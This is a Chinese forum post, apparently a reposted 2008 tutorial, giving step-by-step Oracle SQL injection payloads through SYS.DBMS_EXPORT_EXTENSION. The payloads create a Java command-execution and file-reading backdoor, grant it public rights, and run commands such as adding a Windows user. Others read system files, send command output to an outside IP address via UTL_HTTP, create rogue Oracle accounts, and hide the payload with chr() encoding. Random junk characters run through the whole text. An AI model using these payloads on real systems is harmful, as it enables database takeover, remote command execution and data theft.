以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
6 P8 W5 @/ g: k* }- i& ~8 {/ l8 B
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
) T" U' n( s$ c8 _0 v的形式即可。(用" 'a'|| "是为了让语句返回true值) * o: h/ G8 B1 F) G
语句有点长,可能要用post提交。
- T" u2 V9 u" P" J- U5 F以下是各个步骤:
" n G1 |% ]6 n4 K7 j5 d7 G1 e; \: y1.创建包 % T3 V" ]; q$ z: _8 O
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
* g5 f3 P8 L. f% ~2 ]$ t8 c) h7 ?/xxx.jsp?id=1 and '1'<>'a'||(
/ \; O$ l3 P) j" P- _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''. k" B5 U1 y4 i6 `1 o7 A' Y
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(4 J8 [- o$ N9 a9 k; x9 Z
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
0 h8 r# } U! R- `& L+ p: g/ M}'''';END;'';END;--','SYS',0,'1',0) from dual z0 u% v) O& r4 N" G
) , k0 p' q! i% K) f, v0 j0 o
------------------------ " D0 v( e# C" G+ J/ j) ~
如果url有长度限制,可以把readFile()函数块去掉,即: * z! ?- T! ?/ y A* y' s
/xxx.jsp?id=1 and '1'<>'a'||(
2 e! b% D3 p# Z8 r+ U0 Y: e6 g/ v& wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% {* t2 c i" s2 }' L. _
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) d8 n4 e6 }; u; Z Bnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}} I$ C2 Q4 o6 s) J0 h4 r0 a# M& m
}'''';END;'';END;--','SYS',0,'1',0) from dual
/ m+ Z5 Q M$ Y: a% W3 x. \, X) 3 F( O9 r/ `* x1 r+ S
同时把后面步骤 提到的 对readFile()的处理语句去掉。 3 y" a" ^$ B" S; J- e# |
------------------------------ - d6 ?6 v2 \: y g
2.赋Java权限 ) w% `: M0 H8 e9 q; t" C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
9 Z8 w ?6 s* v6 c: g n3.创建函数 6 ]' ~% p. l U, a& r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') K2 n4 `2 X6 K# h
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
- V1 B c1 n% m. c! Kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 Y' @- T0 o' p5 b# B% s
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual% n2 F4 H2 o, s* q! g& P$ c, o
4.赋public执行函数的权限
4 D, u9 O5 M, ~$ W I" Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ h5 e& g. w1 c2 y' n) h5 Y$ lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual5 [, U- C% Z4 b7 Z' A6 ?0 Q& ]4 n
5.测试上面的几步是否成功
& W- a4 O; b# H; ?and '1'<>'11'||(
4 O9 U+ ^( Y: s% f) J, Z& n# hselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
# _4 [/ S5 g+ s* p* z) / y! b: v% i. Q$ P' m* a
and '1'<>( * E1 n! Y: h+ _! f
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' / L; P3 ]# f+ c* {+ e) \5 ]1 I
)
7 N8 |; U' `- P' x6 U, `6.执行命令: . e/ z" t7 d8 p B
/xxx.jsp?id=1 and '1'<>( ( V7 _) G1 [5 G# L
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
6 P2 f3 s" V7 {& a6 }2 o" a& ?$ ]7 s# x9 z3 W: W
) ' E. i& ~* u" o& M# c1 O3 j/ V0 }
/xxx.jsp?id=1 and '1'<>( 7 E3 }2 q4 J- F
select sys.LinxReadFile('c:/boot.ini') from dual
( g$ j) z/ z0 f6 V& |4 Z9 l B0 x9 v# Y$ A7 B! u/ a
)- R4 l% g- {8 |4 D
- \! m. s( L! _: {' i注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
! x; B8 B: m P如果要查看运行结果可以用 union : 6 L9 p1 C# h: }8 z' A
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual6 o' s+ Q* k3 t4 b' T+ B- F
或者UTL_HTTP.request(:
8 Z+ l6 {8 ?( y! V# F7 U2 V4 I/xxx.jsp?id=1 and '1'<>( |3 u6 r: n" t" p
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
" L6 @5 ], r, y: f)
% j" ~: i6 Z& q* \6 [: D$ W/xxx.jsp?id=1 and '1'<>( . \- _3 v' f- z% y
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual: D7 @0 a6 O: ^4 ?; ]
) 8 r3 ^, N% t8 ~, W n. A+ E
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。$ ]3 F1 Q% f& ^3 O K& n
--------------------
, ? S- x2 b4 T' @& X6.内部变化
* w+ q6 K' L# M0 }; p通过以下命令可以查看all_objects表达改变:
0 X# P! L- \, u4 sselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'( y8 c" @. L7 U1 U$ Q9 K8 X
7.删除我们创建的函数 7 o; y, I x6 O% k# o: ^' K& k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- {* F# f/ ]0 _! _drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
. i5 ]' ?& ^: l1 ]% o==================================================== . v0 u+ K4 V8 J ^% F
全文结束。谨以此文赠与我的朋友。
# P( w! t! c+ u0 g0 a. I, D. i4 p5 z( Elinx # r# F6 D+ f+ N
124829445
; }/ K7 x/ E. R* u" H0 L+ }) k2008.1.12
( y) X; J7 \1 d- |& h3 @) ^; dlinyujian@bjfu.edu.cn
! c- A1 u% _4 s* I. p====================================================================== & K* F! S1 x' O9 C3 J; e& B
测试漏洞的另一方法: ! H' x1 I8 o1 o& ]: V( T5 Q
创建oracle帐号: M2 G X/ i0 N6 A
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: k8 C( A) i% Q _/ h, Q" T6 xCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual; T) e1 J) q7 B0 F& ~) b
即: ! J; r7 h: |8 l: ?4 d4 {0 O I4 J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),. x" C8 e. V/ ~1 `8 R7 H
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
& R$ y5 O* x" e* T _确定漏洞存在:
0 P: v+ I6 ~2 x9 ~$ T! a h2 S8 `1<>( ; C& D4 b" ]; ~% O( `
select user_id from all_users where username='LINXSQL' / U4 M! c+ `! G6 Z- S
) 3 I& O8 H3 `- F2 w o8 e
给linxsql连接权限: ! P* x: ~/ F2 u0 R6 P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; r- l& _" l1 o6 }' ?2 uGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual * C/ B$ b* ~7 u0 E3 ?) M0 U
删除帐号: % H& Y& u2 Y6 p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: o4 c/ J8 Y8 [0 Q4 edrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 4 X: O2 o+ u( R( j! c) J, A3 n% M
======================
4 v2 r8 F/ _, C, Z- s, D以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:1 k" _8 j# U `' N$ n
1.jsp?id=1 and '1'<>( $ D* P0 f0 X- x# }& s% E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% D" S# n: `7 B% r
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual9 z% O( t9 @2 _8 i
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE4 m0 h) G2 P5 q
)7 l1 e6 d8 R6 t
0 `! V! O9 }! U6 y7 a. ~, l# @3 Y, g9 D7 u0 {4 m5 X
1 i* B- T2 z) [4 U' G' P
|
发表于 2012-12-18 12:21:48
收藏
支持
反对